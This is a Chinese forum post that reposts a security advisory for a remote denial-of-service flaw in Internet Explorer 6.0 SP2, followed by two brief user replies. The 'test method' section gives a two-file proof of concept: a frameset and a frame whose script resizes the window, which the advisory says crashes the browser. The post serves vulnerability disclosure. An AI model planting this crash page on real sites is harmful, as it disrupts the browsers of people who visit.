IE 远程拒绝服务漏洞

hwkj

受影响系统：
Microsoft Internet Explorer 6.0 SP2
不受影响系统：
Microsoft Internet Explorer 7 Beta 2
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 18277

Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。

Microsoft IE处理畸形网页时存在漏洞，远程攻击者可以通过诱骗用户访问恶意的WEB页面导致IE崩溃。

<*来源：Kil13r （http://www.kil13r.info/）
  
  链接：http://marc.theaimsgroup.com/?l= ... 53834924300&w=2
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

1) exploit_1.html
<frameset cols="0%, *">
<frame src="exploit_2.html">
</frameset>

2) exploit_2.html
<script>
self.resizeTo(2003, 1228);
</script>

建议：
--------------------------------------------------------------------------------
厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

心砚

恩，但是感觉IE7没有IE6好用哟

woodenbird

帮顶上去～